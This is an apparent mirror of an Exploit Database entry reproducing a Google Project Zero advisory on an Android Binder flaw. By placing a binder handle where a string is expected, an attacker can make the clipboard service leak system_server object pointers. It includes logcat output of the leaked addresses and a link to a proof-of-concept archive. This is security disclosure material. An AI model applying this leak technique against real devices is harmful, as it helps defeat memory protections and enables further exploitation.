Google Android – Insufficient Binder Message Verification Pointer Leak

• Exploit Database
• 26 阅读

• 作者： Google Security Research
  日期： 2016-10-03
• 类别：

  • dos
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/40449/

• Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=860
  
  When frameworks/native/libs/binder/Parcel.cpp reads e.g. a string from a parcel, it does not verify that the string doesn't overlap with any byte range that was tagged as a binder object by the sender. When an attacker sends a parcel to a victim process that contains an unexpected binder handle referring to an object from the victim process where string data is expected, the kernel replaces the attacker-specified handle with a pointer to the object in the victim process. The victim then treats that pointer as part of the attacker-supplied input data, possibly making it available to the attacker at a later point in time.
  
  One example of such an echo service is the "clipboard" service: Strings written using setPrimaryClip() can be read back using getPrimaryClip().
  
  A PoC that leaks the addresses of the "permission", "package" and "clipboard" services from system_server is attached (source code and apk).
  
  Its logcat output looks like this:
  
  ===============
  [...]
  01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2a85
  01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 7362
  01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 17f
  01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0
  01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: fd80
  01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 367b
  01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71
  01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 0
  01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 4c0
  01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 2964
  01-15 05:20:54.529 19158-19158/com.google.jannh.pointerleak E/leaker: 71
  01-15 05:20:54.530 19158-19158/com.google.jannh.pointerleak E/leaker: == service "permission" ==
  type: BINDER_TYPE_BINDER
  object: 0x000000712967e260
  
  == service "package" ==
  type: BINDER_TYPE_BINDER
  object: 0x000000712963cfc0
  
  == service "clipboard" ==
  type: BINDER_TYPE_BINDER
  object: 0x00000071367bfd80
  ===============
  
  
  Proof of Concept:
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40449.zip